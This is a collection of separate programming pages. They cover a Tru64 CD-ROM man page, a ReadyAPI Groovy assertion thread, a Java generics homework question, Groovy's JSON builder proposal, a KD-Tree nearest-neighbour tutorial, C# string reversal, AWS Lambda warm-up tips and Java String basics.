cd_xar, cd_cxar - read the Extended Attribute Record for a CD-ROM file or directory

Rock Ridge and X/Open Extensions to the CDFS library (libcdrom.so, libcdrom.a)

SYNOPSIS
  #include <sys/cdrom.h>

  int cd_xar(char *path, int fsec, struct iso9660_xar *xar, int applen, int esclen);
  int cd_cxar(char *path, int fsec, char *addr, int xarlen);

DESCRIPTION
  The cd_xar routine fills the *xar structure with the contents of the Extended Attribute Record (XAR) associated with the file or directory pointed to by *path. The total number of logical blocks in an XAR can be obtained by calling the cd_drec function; the Logical Block Size in bytes can be obtained by calling the cd_pvd function. The length of the fixed part of the XAR is given by {CD_XARFIXL}, defined in cdfs/xcdr.h, an include file pulled in by sys/cdrom.h.

  The cd_cxar function copies the XAR as recorded on the CD-ROM to the address pointed to by *addr.

RETURN VALUES
  If successful, the routines return the following values: cd_xar returns the number of bytes copied for the variable part of the XAR; cd_cxar returns the number of bytes copied. If unsuccessful, -1 is returned and errno is set to indicate the error.

ERRORS
  The functions will fail if:
  - Search permission is denied for a directory in *path, or read permission is denied for the file or directory pointed to by *path.
  - The address of *path or *addr is invalid.
  - A signal was caught during execution of the function.
  - The argument *path points to a file or directory that is not within the CD-ROM file hierarchy.
  - The value of fsec or xarlen is invalid.
  - {OPEN_MAX} file descriptors are currently open in the calling process.

FILES
  cdfs/xcdr.h, sys/cdrom.h

SEE ALSO
  Functions: cd_drec(3)
http://backdrift.org/man/tru64/man3/cd_cxar.3.html
Assertion for multiple objects with the same value

Hi,

Sometimes I get about 70 objects in my response. I want to assert different values, and it takes a lot of time if I have to do it for each one separately. I'm looking for a faster way to assert, but I can't find the option in ReadyAPI. Maybe it's possible with a (Groovy) script, but I am not familiar with scripting.

Assertion for count of "Employee": if I choose an assertion for count, I can assert the count for "role" but not for "Employee". The expected result for the count of "Employee" must be 3.

Example response:

[
  { "id": "00123456789", "name": "Mike",  "role": "Employee", "city": "New York" },
  { "id": "00123456711", "name": "Jack",  "role": "Employee", "city": "Arizona" },
  { "id": "00123456799", "name": "Bruce", "role": "Employee", "city": "Houston" },
  { "id": "00123456766", "name": "wilma", "role": "Owner",    "city": "Texas" }
]

Solved! Go to Solution.

The Message Content Assertion might help, as it allows you to specify whether values are >, <, or = a certain value for all the attributes in your payload. However, asserting on multiple attributes is always a bit lengthy and tedious. You can use Groovy to help, as in your example, but only if the same values are repeated throughout your payload.

Ta

Rich

@jsontester: You can refer to the code below and adapt the logic to your needs:

import groovy.json.JsonSlurper

def response = testRunner.testCase.getTestStepByName("TEST__STEP__NAME").getPropertyValue("Response")
slurperRes = new JsonSlurper().parseText(response)
def val = slurperRes.PATH__TO__Array

int countEmp = 0
int countOwner = 0
for (int i = 0; i < val.size(); i++) {
    if (val[i].role == "Employee") {
        countEmp = countEmp + 1
    } else if (val[i].role == "Owner") {
        countOwner = countOwner + 1
    }
}
assert countEmp == 3 : "Employee count is not 3"

This is what I have understood and implemented. Please let me know in case you need more help. Click "Accept as Solution" if my answer has helped, and remember to give "Kudos" 🙂 ↓↓↓↓↓

Thanks and Regards,
Himanshu Tayal
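Outside ReadyAPI, the same role-counting check can be sanity-tested in plain Python with the standard json module (a sketch using the sample response from the question as data):

```python
import json

# The example response from the question, as a JSON string
response = """[
  {"id": "00123456789", "name": "Mike",  "role": "Employee", "city": "New York"},
  {"id": "00123456711", "name": "Jack",  "role": "Employee", "city": "Arizona"},
  {"id": "00123456799", "name": "Bruce", "role": "Employee", "city": "Houston"},
  {"id": "00123456766", "name": "wilma", "role": "Owner",    "city": "Texas"}
]"""

records = json.loads(response)

# Tally every role in one pass instead of writing one assertion per object
counts = {}
for rec in records:
    counts[rec["role"]] = counts.get(rec["role"], 0) + 1

assert counts["Employee"] == 3, "Employee count is not 3"
assert counts["Owner"] == 1
```

The same one-pass tally is what the Groovy loop above does; counting into a map scales to any number of roles without extra code.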
https://community.smartbear.com/t5/ReadyAPI-Questions/Assertion-multiple-objects-for-the-same-value/m-p/212958/highlight/true
I'm trying to come up with an add method for a generic class I created. Generally the objects I create will be arrays, of type Integer, Double, or String. I don't know how to go about making the add method to have stuff added to the array... here's my code so far:

/**
 * The MyList class holds X and Y coordinates.
 * The data type of the coordinates is generic.
 */
public class MyList<T extends Number> {
    private T xCoordinate; // The X coordinate
    private T yCoordinate; // The Y coordinate

    /**
     * Constructor
     * @param x The X coordinate.
     * @param y The Y coordinate.
     */
    public MyList(T x, T y) {
        xCoordinate = x;
        yCoordinate = y;
    }

    /**
     * The setX method sets the X coordinate.
     * @param x The value for the X coordinate.
     */
    //INSERT INFO HERE
    //PLEASE HELP!!!
    public void add(T[] array, int i) {
        int[] newArray = new int[array.length];
        System.arraycopy(array, 0, newArray, 0, array.length);
        newArray[newArray.length - 1] = i;
        return newArray;
    }
}

I keep getting a compiler error... with the code above, does it meet the requirements of my assignment?

ASSIGNMENT: Write a generic class named MyList, with a type parameter T. The type parameter T should be constrained to an upper bound: the Number class. The class should have as a field an ArrayList of T. Write a public method named add, which accepts a parameter of type T. When an argument is passed to the method, it is added to the ArrayList.
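For comparison only, the contract the assignment describes (a growable list field plus an add method that appends one element) can be sketched language-neutrally in Python; this is not the Java answer itself, and the runtime number check merely approximates Java's <T extends Number> bound:

```python
class MyList:
    """Sketch of the assignment's contract: a list field and an add() method."""

    def __init__(self):
        # corresponds to the ArrayList<T> field the assignment asks for
        self.items = []

    def add(self, value):
        # approximate the 'T extends Number' upper bound with a runtime check
        if not isinstance(value, (int, float)):
            raise TypeError("value must be a number")
        self.items.append(value)

lst = MyList()
lst.add(3)
lst.add(4.5)
assert lst.items == [3, 4.5]
```

Note that nothing needs to be copied or resized by hand: appending to a growable list is the whole method, which is also why the assignment asks for an ArrayList field rather than a plain array.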
https://www.daniweb.com/programming/software-development/threads/260664/add-method-for-arraylists
Provide a builder/slurper combination for handling data in JSON format in a similar fashion as it's already done for XML.

JSON has become ubiquitous on the web. RESTful services exchange data in both POX (Plain Old XML) and JSON formats. Groovy has excellent support for producing/consuming XML with MarkupBuilder, XmlSlurper and XmlParser, but lacks this kind of support for JSON. This GEP strives to remedy the situation by providing a compatible builder approach. The following builder syntax is proposed:

def builder = new groovy.json.JsonBuilder()
def root = builder.people {
    person {
        firstName 'Guillaume'
        lastName 'Laforge'
        // Maps are valid values for objects too
        address(
            city: 'Paris',
            country: 'France',
            zip: 12345,
        )
        married true
        conferences 'JavaOne', 'Gr8conf'
    }
}

// creates a data structure made of maps (JSON object) and lists (JSON array)
assert root instanceof Map

println builder.toString()
// prints (without formatting)
{"people": {
    "person": {
        "firstName": "Guillaume",
        "lastName": "Laforge",
        "address": {
            "city": "Paris",
            "country": "France",
            "zip": 12345
        },
        "married": true,
        "conferences": ["JavaOne", "Gr8conf"]
    }
}}

Valid node values are: Number, String, GString, Boolean, Map, List. null is reserved for object references. Arrays can not be null but they can be empty. Anything else results in an IAE (or a more specialized exception) being thrown.

There is a special case to be considered: when the top node results in an anonymous object or array. For objects, a call() method on the builder is needed which takes a map as argument; for arrays, call() takes a vararg of values. Here are some examples:

builder.foo "foo"
// produces {foo: "foo"}

builder([{ foo 'foo' }])
// produces [{"foo": "foo"}]

builder([[ foo: 'foo' ]])
// produces, same as above
[{"foo": "foo"}]

builder { elem 1, 2, 3 }
// produces { "elem": [1, 2, 3] }

When a method is called on the builder without arguments, an empty JSON object is associated with the key:

builder.element()
// produces { "element": {} }

You can also pass a map and a closure argument:

builder.person(name: "Guillaume", age: 33) { town "Paris" }
// produces {"name": "Guillaume", "age": 33, "town": "Paris"}

Calls like the following, with a map and a value, don't have any meaningful representation in JSON (unlike in XML), and trigger a JsonException:

shouldFail(JsonException) {
    builder.elem(a: 1, b: 2, "some text value")
}

In case of overlapping keys in the map and the closure, the closure wins; a visual clue for this rule is that the closure appears "after" the map key/value pairs.

The proposal is for the creation of a JsonSlurper class that can read JSON from a string (in a non-streaming fashion) and produce a hierarchy of maps and lists representing the JSON objects and arrays respectively.

String json = '{"person": {"firstName": "Guillaume", "lastName": "Laforge", "conferences": ["JavaOne", "Gr8conf"]}}'
def root = new JsonSlurper().parseText(json)
assert root instanceof Map
assert root.person.conferences instanceof List
assert root.person.firstName == 'Guillaume'
assert root.person.conferences[1] == 'Gr8conf'

JsonSlurper's API should mirror closely what XmlParser/XmlSlurper offers in terms of its parse* method variants.

Built-in JSON support in Groovy 1.8
http://docs.codehaus.org/exportword?pageId=184385558
This post is branched from my earlier posts on designing a question-question similarity system. In the first of those posts, I discussed the importance of speed of retrieval of the most similar questions from the training data, given a question asked by a user in an online system. We designed a few strategies, such as the HashMap based retrieval mechanism. The HashMap based retrieval assumes that at least one word is shared between the most similar questions and the asked question. In most practical situations this will suffice about 95% of the time, but there could be 5% of cases where either the question being asked has completely new vocabulary (more probable) or none of the words in the asked question and the most similar questions are the same (less probable).

Note: "similar" doesn't mean that a pair of questions has to have at least one word in common. Take, for example, the pair of questions "What is the minimum age to buy a gun?" and "How old do I need to be to obtain a weapon?". Ignoring the stop-words, none of the words are shared between the two questions.

In this post, we look at an alternative to linear scanning (note that we do not scan all questions, we scan only the questions represented by the cluster heads). It's quite obvious that if there are N questions with feature size D, then a linear scan over them takes O(N*D) time and space complexity. The idea of a KD-Tree is to construct a tree out of the questions in such a way that the time complexity of searching for an exact match or the nearest matching questions is reduced. For example, given N points in 1-D space, if the points are sorted, searching for a point (whether it exists or not) takes O(log N) time using plain binary search. Searching for the nearest point to a reference point is also O(log N), as we show below.
A Python implementation to find the nearest element given a reference point (assuming the points are sorted in 1-D space):

def get_nearest(arr, ref):
    left, right = 0, len(arr) - 1
    while left <= right:
        mid = (left + right) // 2
        if arr[mid] > ref:
            right = mid - 1
        else:
            left = mid + 1
    # 'left' is now the first index whose value is greater than 'ref'
    if left == len(arr):
        return arr[-1]
    if left > 0 and abs(arr[left - 1] - ref) < abs(arr[left] - ref):
        return arr[left - 1]
    return arr[left]

The code searches for the interval of the array in which our reference point lies, and then returns either the left or the right end of that interval, depending on which one is closer to the reference point. (When the reference point is greater than every element, 'left' runs off the end of the array, so we clamp it to the last element.)

The case for 1-D was quite simple. Now consider points in 2-D. The idea is to first divide the points into two parts along the x-axis (points which lie to the left and points which lie to the right of the split). Then split each of the left and right sides further into two parts, but this time along the y-axis, so that each of the left and right parts is split into up and down sub-parts. Repeat the process in round-robin fashion until no further splitting is possible.

KD Tree splitting in 2 dimensions (Source: ResearchGate)

The split-point is chosen to be the point having the median value along the split axis. Once the tree is constructed, searching for an exact point in the tree takes O(D*log(N)) time. Why? If the root is the reference point, then we are done (in O(D) time); otherwise compare with the root's value along its split axis, i.e. the x-axis. If the value of the reference point along the x-axis is less than or equal to the split value at the root, search the left sub-tree, else search the right sub-tree. For example, to search for (60, 80) in the tree below, one would compare 60 with 51 (the x-axis value of the root), decide that 60 > 51, and go to the right sub-tree. Then compare 80 with 70 (the y-axis value of the root of the right sub-tree), decide that 80 > 70, go right again, and so on.
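The same interval search is what Python's standard bisect module implements, so the 1-D idea can be sanity-checked against a brute-force scan (hypothetical data, not from the question system):

```python
import bisect

def nearest_sorted(arr, ref):
    # index of the first element strictly greater than ref,
    # exactly the 'left' produced by the binary search above
    i = bisect.bisect_right(arr, ref)
    if i == 0:
        return arr[0]
    if i == len(arr):
        return arr[-1]
    # compare the two neighbors around the insertion point
    return arr[i - 1] if abs(arr[i - 1] - ref) <= abs(arr[i] - ref) else arr[i]

points = [1, 4, 9, 16, 25, 36]
for ref in (-3, 5, 17, 100):
    # brute-force O(N) scan gives the reference answer
    assert nearest_sorted(points, ref) == min(points, key=lambda p: abs(p - ref))
```

Both paths agree on every query, including the two boundary cases where the reference point falls below the smallest or above the largest element.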
KD-Tree constructed out of 2D points.

Note that by round-robin splitting we are trying to ensure that the tree is as balanced as possible. Thus with N points, the maximum height is O(log N). Since at each level of the tree we examine at most one point, and each point is D (= 2 here) dimensional, the time complexity for exact search is O(D*log(N)). But round-robin splitting may not always be optimal (what if all or most of the points lie along the x-axis?).

Searching for the nearest point is a bit tricky in more than one dimension. Let's traverse the tree as we would for exact search. For example, if our reference point is (50, 2) (shown in green below), then by traversing the tree we would land in the bounding box with (10, 30) on the left boundary and (25, 40) on the top boundary. Now, is it true that either (10, 30) or (25, 40) is the closest point to (50, 2)? No, because the closest point is (55, 1), which is inside the bounding box to the right. That means we cannot simply traverse the tree in a single left-or-right direction at each step to get to the solution, as we can for exact search.

Bounding Box

To solve this problem, we need to know whether we must search only one side of a sub-tree or both sides. But how do we know that? Since we reached our destination by traversing last through (10, 30), we compute the (Euclidean) distance of (50, 2) from (10, 30), which is 48.83. This distance becomes the radius of a sphere centered at our reference point. Now, if this sphere cuts through the plane of the split axis (x=10), then we also need to scan the left side of the plane, because some region on the left side of the plane can fall inside this sphere. That is indeed the case here, since the perpendicular distance of the reference point from the plane x=10 is 40 < 48.83, implying that the sphere cuts through the x=10 plane. Fortunately, (1, 10) is at a distance of 49.65, which is greater than 48.83, and thus our best guess remains (10, 30).
Once we have looked into all possible branches of a sub-tree, we start to backtrack up the tree. (25, 40) is split on the y-axis (y=40). Since the perpendicular distance from y=40 to (50, 2) is 38 < 48.83 (the radius of the smallest sphere seen so far), the sphere cuts through this plane too, and we need to scan the other side of y=40 as well. Repeating the same for the right sub-tree of (25, 40), we find that the point (50, 50) is closer, i.e. distance = 48 < 48.83. Thus our new solution becomes (50, 50). Once we are done checking the left and right sub-trees of (25, 40), we check the distance of the reference point from the root (25, 40) itself. It is 45.49 < 48, so (25, 40) becomes our current best solution.

Next up, (51, 75) is split on the x-axis by the x=51 plane. The perpendicular distance of (50, 2) from the x=51 plane is 1, which is less than 45.49 (the radius of the smallest sphere seen so far). Thus we need to scan the right sub-tree rooted at (51, 75). Repeating the above process, we eventually find the true closest point, (55, 1).

Note that by the time we discover our solution (55, 1), we have scanned each and every point in the tree. Thus nearest neighbor search in a KD-Tree has a worst-case complexity of O(N*D), the same as a linear scan. If the reference point had been, say, (12, 33), then we would not have needed to go towards the right sub-tree of (25, 40) or the right sub-tree of (51, 75), because the radius of the sphere from (10, 30) is 3.6, which is less than the perpendicular distances of (12, 33) from y=40 (which is 7) and from x=51 (which is 39).

Here is a small animation taken from Wikipedia explaining how we go about searching the tree:

Nearest Neighbor Search

Time to code up!!! Instead of going by the traditional approach of using recursive functions to build and query the tree (as done in many articles and tutorials), we will take an iterative approach, because recursion will throw an error when the depth of the tree increases beyond the maximum recursion depth.
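The worked example above can be checked against the brute-force linear scan, which is the O(N*D) baseline the KD-Tree is meant to beat (the five points are the ones used in the walkthrough):

```python
import numpy as np

def linear_scan_knn(vectors, query, k):
    # O(N*D): compute every Euclidean distance, keep the k smallest
    dists = np.sqrt(np.sum((vectors - query) ** 2, axis=1))
    order = np.argsort(dists)[:k]
    return [(float(dists[i]), int(i)) for i in order]

pts = np.array([[1.0, 10.0], [10.0, 30.0], [25.0, 40.0], [50.0, 50.0], [55.0, 1.0]])
result = linear_scan_knn(pts, np.array([50.0, 2.0]), 1)

# (55, 1) at index 4 is the closest point to (50, 2), as derived in the text
assert result[0][1] == 4
```

The intermediate distances this computes (49.65 for (1, 10), 48.83 for (10, 30), 45.49 for (25, 40), 48 for (50, 50)) are exactly the sphere radii used in the backtracking argument above.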
Although the depth grows only as O(log N), we still did not want to take any chances. For the iterative solution, we will use a queue-based approach that builds the tree level by level.

import numpy as np
import time, math, heapq
from collections import deque

"""
Class for defining all variables that go into the queue
while constructing the KD Tree
"""
class QueueObj(object):
    def __init__(self, indices, depth, node, left, right):
        self.indices, self.depth, self.node = indices, depth, node
        self.left, self.right = left, right

"""
Class for defining the node properties for the KD Tree
"""
class Node(object):
    def __init__(self, vector, split_value, split_row_index):
        self.vector, self.split_value, self.split_row_index = vector, split_value, split_row_index
        self.left, self.right = None, None

"""
KD Tree class starts here
"""
class KDTree(object):
    def __init__(self, vectors):
        self.vectors = vectors
        self.root = None
        self.vector_dim = vectors.shape[1]

    def construct(self):
        n = self.vectors.shape[0]
        queue = deque([QueueObj(range(n), 0, None, 0, 0)])

        while len(queue) > 0:
            qob = queue.popleft()
            q_front, depth, parent, l, r = qob.indices, qob.depth, qob.node, qob.left, qob.right

            axis = depth % self.vector_dim

            vectors = np.argsort(self.vectors[q_front, :][:, axis])
            vectors = [q_front[vec] for vec in vectors]

            m = len(vectors)
            median_index = int(m / 2)
            split_value = self.vectors[vectors[median_index]][axis]

            left, right = median_index + 1, m - 1
            while left <= right:
                mid = int((left + right) / 2)
                if self.vectors[vectors[mid]][axis] > split_value:
                    right = mid - 1
                else:
                    left = mid + 1
            median_index = left - 1

            node = Node(self.vectors[vectors[median_index]], split_value, vectors[median_index])

            if parent is None:
                self.root = node
            else:
                if l == 1:
                    parent.left = node
                else:
                    parent.right = node

            if median_index > 0:
                queueObj = QueueObj(vectors[:median_index], depth + 1, node, 1, 0)
                queue.append(queueObj)

            if median_index < m - 1:
                queueObj = QueueObj(vectors[median_index + 1:], depth + 1, node, 0, 1)
                queue.append(queueObj)

Each node stores the row vector that was used to decide the split, the split value along the axis, the row in the original matrix that corresponds to this vector, and the left and right sub-tree pointers.

Run-time analysis: had we written the above code using recursion, the time complexity would be given by T(n) = 2T(n/2) + c*n*log(n), because at each level of the tree we sort the rows passed to the current node from its parent node and then split them into two (roughly) equal parts. The above recurrence relation solves to:

T(n) = O(n*log²(n))

One can theoretically bring it down to O(n*log(n)) by pre-sorting the matrix and then tracking which rows go where, but the code becomes a bit complicated. Moreover, the tree construction phase is an offline process, so a factor of log(n) vs. log²(n) doesn't really affect the overall latency.

We are choosing the median as the split value. Note that multiple rows can share the same median value along the split axis, and in that case we choose to send all rows with values less than or equal to the median to the left sub-tree. This is taken care of by the small piece of code that uses binary search to find the last row with the same median value in the sorted array:

left, right = median_index + 1, m - 1
while left <= right:
    mid = int((left + right) / 2)
    if self.vectors[vectors[mid]][axis] > split_value:
        right = mid - 1
    else:
        left = mid + 1
median_index = left - 1

Construct the tree by calling:

tree = KDTree(arr)
tree.construct()

Choosing the split axis in a round-robin manner is not the only way. A more optimal technique is to choose the axis for which the difference between the value after the median and the value before the median is greatest. Can you guess why this is a better strategy?
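That alternative axis choice can be sketched as a standalone helper (hypothetical, not part of the KDTree class above): for each axis, measure the gap around the median of the sorted values and pick the axis with the widest gap, since a wide gap means the splitting plane separates the two halves cleanly and spheres around query points are less likely to cross it.

```python
import numpy as np

def pick_split_axis(vectors):
    # For each axis, sort the values along it and measure the gap between
    # the values just after and just before the median position.
    m = vectors.shape[0]
    mid = m // 2
    best_axis, best_gap = 0, -1.0
    for axis in range(vectors.shape[1]):
        vals = np.sort(vectors[:, axis])
        gap = vals[min(mid + 1, m - 1)] - vals[max(mid - 1, 0)]
        if gap > best_gap:
            best_axis, best_gap = axis, float(gap)
    return best_axis

# x-values are widely spread while y-values are bunched together,
# so the x-axis is the better split axis here
pts = np.array([[0.0, 0.1], [1.0, 0.2], [5.0, 0.3], [9.0, 0.15]])
assert pick_split_axis(pts) == 0
```

With round-robin, this degenerate cloud would waste every other level splitting on the nearly constant y-axis.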
Following is the code for performing exact search on the above KD Tree:

def search(self, vector):
    node = self.root
    depth = 0
    while node is not None:
        if np.array_equal(node.vector, vector):
            return True
        axis = depth % self.vector_dim
        if vector[axis] <= node.split_value:
            node = node.left
        else:
            node = node.right
        depth += 1
    return False

The above function is as simple as searching a binary tree. In our question-similarity case, the requirement is to find the nearest K questions given a customer question, or only the questions within a specific radius; the single closest point is a special case of this. So we have written the function with the generic case of K nearest neighbors in mind. The function below can be easily modified to handle distance-threshold based nearest neighbors.

We are using a max-heap data structure to store the smallest K distances discovered so far in the tree, and we keep updating the heap. Note that when we have to decide whether we should scan both sub-trees, we use the root of the max-heap (the maximum among the smallest K distances) as the radius of the sphere when deciding whether the split plane cuts through the sphere, because there could be some point at a distance less than the root of the max-heap but greater than the children of the root.
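The max-heap trick can be shown in isolation: Python's heapq is a min-heap, so distances are negated, making heap[0] the negation of the largest distance currently kept (the sphere radius used for pruning). This is a standalone sketch with hypothetical distances, not the class method itself:

```python
import heapq

def keep_k_smallest(distances, k):
    heap = []  # stores negated distances; heap[0] is -(largest kept distance)
    for d in distances:
        if len(heap) < k:
            heapq.heappush(heap, -d)
        elif -heap[0] > d:
            # d beats the worst of the current k: evict and insert in one step
            heapq.heapreplace(heap, -d)
    return sorted(-x for x in heap)

assert keep_k_smallest([5.0, 1.0, 9.0, 3.0, 7.0], 3) == [1.0, 3.0, 5.0]
```

At any moment, -heap[0] is the current pruning radius: a split plane farther away than that from the query point cannot hide a better neighbor.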
def insert_distance_into_heap(self, distances, node, node_distance, k):
    if len(distances) == k and -distances[0][0] > node_distance:
        heapq.heappop(distances)
    if len(distances) < k:
        heapq.heappush(distances, (-node_distance, node.split_row_index))

def nearest_neighbor(self, vector, k):
    search_stack = [(self.root, 0)]
    distances, visited = [], set()

    while len(search_stack) > 0:
        node, depth = search_stack[-1]
        axis = depth % self.vector_dim
        child_node = None

        if vector[axis] <= node.split_value:
            if node.left is None or node.left.split_row_index in visited:
                node_distance = math.sqrt(np.sum((node.vector - vector) ** 2))
                if node.right is None or node.right.split_row_index in visited:
                    self.insert_distance_into_heap(distances, node, node_distance, k)
                else:
                    w = node_distance if len(distances) == 0 else -distances[0][0]
                    if node.split_value - vector[axis] <= w:
                        child_node = node.right
            else:
                child_node = node.left
        else:
            if node.right is None or node.right.split_row_index in visited:
                node_distance = math.sqrt(np.sum((node.vector - vector) ** 2))
                if node.left is None or node.left.split_row_index in visited:
                    self.insert_distance_into_heap(distances, node, node_distance, k)
                else:
                    w = node_distance if len(distances) == 0 else -distances[0][0]
                    if vector[axis] - node.split_value <= w:
                        child_node = node.left
            else:
                child_node = node.right

        if child_node is None or child_node.split_row_index in visited:
            visited.add(node.split_row_index)
            search_stack.pop()
        else:
            search_stack.append((child_node, depth + 1))

    distances = [(-x, y) for x, y in distances]
    distances = sorted(distances, key=lambda d: d[0])
    return distances

Again, instead of recursion we are using an iterative method for finding the K nearest neighbors. But instead of a queue, we use a stack data structure, since we are going depth-wise and not level-wise.
Also note that we keep a set "visited" to track all those nodes for which we have finished scanning the node itself as well as its left and right sub-trees. The first level of the if..else condition is the same as in the exact search method: we go to the left sub-tree if the value of the reference point along the split axis is less than or equal to the node's split value, else we go right. But then for each node we check whether the node has already been "visited" or is a leaf node. If either is true, we insert the distance from the node to the reference point into our max-heap; otherwise we either go to the other side of the sub-tree (when the sphere cuts the splitting plane) or backtrack upwards.

To improve the search speed, instead of using the split plane itself, one can use the planes along the same axis that pass through the nearest points on each side of the split plane (support planes). To use this method, we need to save, along with the node properties, the nearest points to the split plane on both sides.
Nearest planes to the split plane along the x-axis (shown in dotted lines).

class Node(object):
    def __init__(self, vector, split_value, split_row_index, left_nearest, right_nearest):
        self.vector, self.split_value, self.split_row_index = vector, split_value, split_row_index
        self.left_nearest, self.right_nearest = left_nearest, right_nearest
        self.left, self.right = None, None

Add the following in the 'construct' method of the KDTree class:

a, b = max(0, int(m / 2) - 1), min(m - 1, median_index + 1)
left_nearest, right_nearest = self.vectors[vectors[a]][axis], self.vectors[vectors[b]][axis]
node = Node(self.vectors[vectors[median_index]], split_value, vectors[median_index], left_nearest, right_nearest)

And modify the 'nearest_neighbor' function as follows:

# For scanning the right sub-tree
if node.right_nearest - vector[axis] <= w:
    child_node = node.right

# For scanning the left sub-tree
if vector[axis] - node.left_nearest <= w:
    child_node = node.left

To modify the above code to handle a threshold-based distance metric, we just have to modify the function "insert_distance_into_heap" to insert into a list, based on the threshold, instead of into a heap.

Performance analysis: although exact search on the KD-Tree is very fast compared to linear search, the nearest neighbor search performance is rather poor. In several experiments, the run time of nearest neighbor search was on par with the linear scan method. From a visual analysis perspective, we gain an advantage over linear scan only when the points in the KD-Tree are well spaced out in the D-dimensional hyperspace; otherwise, in most cases we end up visiting O(N) nodes. In a way this is similar to clustering: clustering helps only when the intra-cluster distances are much smaller than the inter-cluster distances.

Categories: MACHINE LEARNING, PROBLEM SOLVING Tags: K Nearest Neighbors, KD Tree, Nearest Neighbor, Question Similarity, Queue, Stack
http://www.stokastik.in/using-kd-tree-for-nearest-neighbor-search/
I will explain in this article how to reverse a given string in a Windows console application using C#, without using a built-in function. This type of question might be asked by an interviewer in a .NET-related interview.

Use the code given further below in the Program.cs class file. In the program I have explained in comments which statement is used for which purpose. If you run the program with the input string vithal wadje, the output will be the reversed string.

My intent for this article is to explain how to answer a question that is often asked in an interview: write a program to reverse the given string without using the string functions. A candidate new to interviews can become totally confused, because the first problem is that the candidate only thinks about functions, not about other techniques to reverse a string.

What is a String?

A string is a sequence of characters enclosed within double quotation marks. Examples: "vithal wadje", "C#", "Mumbai", "Five hundred", etc. I hope you understand strings now.

What does reversing a string mean?

Changing the position of the characters from right to left, one by one, is called reversing a string. For example, suppose the given input is:

vithal wadje

Then the given string can be reversed into:

ejdaw lahtiv

Now that we completely understand what is meant by reversing a string, next I will explain how to do it step by step, as in the following:
- Open Visual Studio from Start -> All Programs -> Microsoft Visual Studio.
- Then go to "File" -> "New" -> "Project...", then select Visual C# -> Windows -> Console Application.
- After that, specify a name such as ReverseString (or whatever name you wish) and the location of the project, and click on the OK button. The new project is created.
using System;

namespace ReverseString
{
    class Program
    {
        static void Main(string[] args)
        {
            string Str, Revstr = "";   // for storing the string values
            int Length;                // for holding the length of the given string

            Console.Write("Enter A String : ");  // show a message to the user
            Str = Console.ReadLine();            // allow the user to input a string
            Length = Str.Length - 1;             // store the index of the last character

            while (Length >= 0)  // loop over the given string from the end
            {
                Revstr = Revstr + Str[Length];  // append the characters in reverse order
                Length--;
            }

            Console.WriteLine("Reverse String Is {0}", Revstr);  // display the output to the user
            Console.ReadLine();  // keep the window open
        }
    }
}

Summary

From the examples above I have explained how to reverse a string. I hope this article is useful for beginners and anyone preparing for an interview. If you have any suggestions or feedback, please contact me.
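The same manual technique, sketched in Python for comparison (deliberately avoiding built-in reversal such as slicing or reversed()): walk the string from its last index down to 0, appending each character.

```python
def reverse_string(s):
    # walk the original string from the last index down to 0,
    # mirroring the C# while-loop above
    rev = ""
    i = len(s) - 1
    while i >= 0:
        rev += s[i]
        i -= 1
    return rev

# the article's example input and output
assert reverse_string("vithal wadje") == "ejdaw lahtiv"
```

Repeated string concatenation is O(n²) in the worst case since strings are immutable in both languages; for long inputs, collecting characters in a list (or a StringBuilder in C#) and joining once is the idiomatic fix.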
http://www.compilemode.com/2015/05/reverse-string-without-using-function-in-C-Sharp.html
Lambda Tips @WIP

Taking advantage of a running Lambda function and its state

A nice "trick" under the Lambda function section is to set app = None at module level, above the handler, and then have the handler check whether it has been set:

app = None

def lambda_handler(event, context):
    global app
    # Initialize app if it doesn't yet exist
    if app is None:
        print("Loading config and creating new MyApp...")
        config = load_config(full_config_path)
        app = MyApp(config)
    return "MyApp config is " + str(app.get_config()._sections)

If app is already set, the handler will not build it again; it takes advantage of the warm container's state and reuses it.

Keep Warm

You can set up a bunch of schedulers, and your Lambda function can check the context of each request. If it is a scheduler event, it just replies OK; otherwise it does what it normally would do.

import boto3
from config import Config

class KeepAwake:
    def __init__(self):
        """ keep awake """
        self.config = Config()
        self.region = self.config.region
        self.app_env = self.config.app_env
        self.client = boto3.client('lambda', region_name=self.region)
        self.functions = [
            "foo",
            "bar",
        ]

    def run(self):
        """ iterate over lambda functions """
        for lam in self.functions:
            print("Invoking ", lam)
            self.client.invoke(
                FunctionName=lam,
                InvocationType="Event"
            )
            print("Invoked ", lam)

This is another way to go around and invoke those functions to keep them warm.
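Stripped of the Lambda specifics, the warm-container trick is plain module-level memoization; this self-contained sketch (expensive_init stands in for loading config and building MyApp) shows that the init runs only on the first, "cold" invocation:

```python
app = None
init_count = 0

def expensive_init():
    # stands in for load_config() + MyApp() in the handler above
    global init_count
    init_count += 1
    return {"ready": True}

def handler(event, context=None):
    global app
    if app is None:  # only the first (cold) invocation pays the cost
        app = expensive_init()
    return app

# three "invocations" of the same warm container
handler({})
handler({})
handler({})
assert init_count == 1  # init ran exactly once
```

In a real Lambda this works because the module (and its globals) survives between invocations for as long as the container stays warm, which is exactly what the Keep Warm schedulers above try to guarantee.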
https://alfrednutile.info/posts/264/
A string is a sequence of characters. Unlike many other languages, which implement strings as character arrays, Java implements strings as objects of type String. Implementing strings as built-in objects allows Java to provide a full complement of features that make string handling convenient. The Java platform provides the String class to create and manipulate strings.

The most direct way to create a string is to write:

String greeting = "Hello world!";

Whenever it encounters a string literal in your code, the compiler creates a String object with its value, in this case "Hello world!". As with any other object, you can create a String object by using the new keyword and a constructor. The String class has 11 constructors that allow you to provide the initial value of the string using different sources, such as an array of characters.

Example

public class StringDemo {
    public static void main(String args[]) {
        char[] helloArray = { 'h', 'e', 'l', 'l', 'o', '.' };
        String helloString = new String(helloArray);
        System.out.println(helloString);
    }
}

This will produce the following result:

Output
hello.

The length of a string is the number of characters it contains. To obtain this value, call the length() method:

int length()

The following fragment prints "3", since there are three characters in the string s:

char chars[] = { 'a', 'b', 'c' };
String s = new String(chars);
System.out.println(s.length());

This program is an example of length(), a method of the String class.

Example

public class StringExample {
    public static void main(String args[]) {
        String palindrome = "Dot saw I was Tod";
        int len = palindrome.length();
        System.out.println("String Length is : " + len);
    }
}

This will produce the following result:

Output
String Length is : 17

The String class includes a method for concatenating two strings:

string1.concat(string2);

This returns a new string that is string1 with string2 added to it at the end.
